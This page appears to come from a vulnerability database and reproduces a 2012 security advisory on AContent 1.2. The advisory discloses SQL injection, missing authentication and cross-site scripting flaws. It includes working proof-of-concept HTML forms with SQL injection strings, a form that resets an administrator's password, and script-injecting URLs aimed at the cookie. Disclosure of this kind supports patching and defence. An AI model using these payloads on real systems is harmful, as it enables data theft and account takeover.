Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
htbridgeHigh-Tech BridgeHTB23117
HistorySep 26, 2012 - 12:00 a.m.

Multiple vulnerabilities in AContent

2012-09-2600:00:00
High-Tech Bridge
www.htbridge.com
30

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.033 Low

EPSS

Percentile

90.3%

JSON

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in AContent, which can be exploited to bypass authentication and to perform Cross-Site Scripting (XSS) and SQL Injection attacks.

  1. SQL Injection in AContent: CVE-2012-5167
    1.1 The vulnerability exists due to insufficient sanitation of input data in the “field” HTTP POST parameter in /course_category/index_inline_editor_submit.php. A remote unauthenticated user can execute arbitrary SQL commands in applications database. The following PoC (Proof of Concept) demonstrates the vulnerability: <form action="http://[host]/course_category/index_inline_editor_submit.php" method="post"> <input type="hidden" name="field" value="category_name-1 AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2)))" /> <input type="hidden" name="value" value="1" /> <input type="submit" id="btn"> </form> 1.2 The vulnerability exists due to insufficient sanitation of input data in the "field" HTTP POST parameter in /user/index_inline_editor_submit.php. A remote unauthenticated user can execute arbitrary SQL commands in applications database.
    The following PoC (Proof of Concept) demonstrates the vulnerability:
    <form action=“http://[host]/user/index_inline_editor_submit.php” method=“post”>
    <input type=“hidden” name=“field” value=“password=((select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))))-1” />
    <input type=“hidden” name=“value” value=“1” />
    <input type=“submit” id=“btn”>
    </form>
    1.3 Input passed via the “id” GET parameter to /user/user_password.php in POST request is not properly sanitised before being used in SQL query.
    This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
    The following PoC (Proof of Concept) demonstrates the vulnerability:
    <form action=“http://[host]/user/user_password.php?id=1’ AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a%2b1)%252)))%20–%20” method=“post”>
    <input type=“hidden” name=“submit” value=“1” />
    <input type=“submit” id=“btn”>
    </form>
    Successful exploitation of vulnerability 1.3 requires attacker to be registered and logged-in.

  2. Improper Authentication in AContent: CVE-2012-5168
    2.1 The vulnerability exists due to absent authentication in the “/user/index_inline_editor_submit.php” script. A remote unauthorized attacker can change users’ passwords.
    The following example will change password for user with id=1 to ‘password’.
    <form action=“http://[host]/user/index_inline_editor_submit.php” method=“post”>
    <input type=“hidden” name=“field” value=“password-1” />
    <input type=“hidden” name=“value” value=“5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8” />
    <input type=“submit” id=“btn”>
    </form>
    2.2 The vulnerability exists due to absent authentication in the “/course_category/index_inline_editor_submit.php” script. A remote unauthorized attacker can modify names for existing categories.
    The following example will change category name with id=1 to ‘new_category’:
    <form action=“http://[host]/course_category/index_inline_editor_submit.php” method=“post”>
    <input type=“hidden” name=“field” value=“category_name-1” />
    <input type=“hidden” name=“value” value=“new_category” />
    <input type=“submit” id=“btn”>
    </form>

  3. Cross-Site Scripting (XSS) in AContent: CVE-2012-5169
    Input passed via the HTTP GET parameters “pathext”, “popup”, “framed”, and “file” to /file_manager/preview_top.php is not properly sanitised before being returned to the user.
    This can be exploited to execute arbitrary HTML and script code in user’s browser session in context of an affected website.
    The following PoCs (Proof of Concept) demonstrate the vulnerabilities:
    http://[host]/file_manager/preview_top.php?pathext=%22%3E%3Cscript%3Ealert%2 8document.cookie%29;%3C/script%3E
    http://[host]/file_manager/preview_top.php?popup=%22%3E%3Cscript%3Ealert%28d ocument.cookie%29;%3C/script%3E
    http://[host]/file_manager/preview_top.php?framed=%22%3E%3Cscript%3Ealert%28 document.cookie%29;%3C/script%3E
    http://[host]/file_manager/preview_top.php?file=%22%3E%3Cscript%3Ealert%28do cument.cookie%29;%3C/script%3E

CPENameOperatorVersion
acontentle1.2

Related

securityvulns 2
exploitpack 1
packetstorm 1
exploitdb 1
prion 5
cve 5
securityvulns
securityvulns
Multiple vulnerabilities in AContent
2012-10-22 00:00:00
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2012-10-22 00:00:00
exploitpack
exploitpack
ATutor 1.2 - Multiple Vulnerabilities
2012-10-22 00:00:00
packetstorm
packetstorm
ATutor AContent 1.2 XSS / Authentication / SQL Injection
2012-10-18 00:00:00
exploitdb
exploitdb
ATutor 1.2 - Multiple Vulnerabilities
2012-10-22 00:00:00
prion
prion
Sql injection
2012-10-22 23:55:00
Design/Logic Flaw
2012-10-22 23:55:00
Cross site scripting
2012-10-22 23:55:00
cve
cve
CVE-2012-5167
2012-10-22 23:55:00
CVE-2012-5169
2012-10-22 23:55:00
CVE-2012-5168
2012-10-22 23:55:00

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.033 Low

EPSS

Percentile

90.3%

JSON
Related for HTB23117
securityvulns2exploitpack1packetstorm1exploitdb1prion5cve5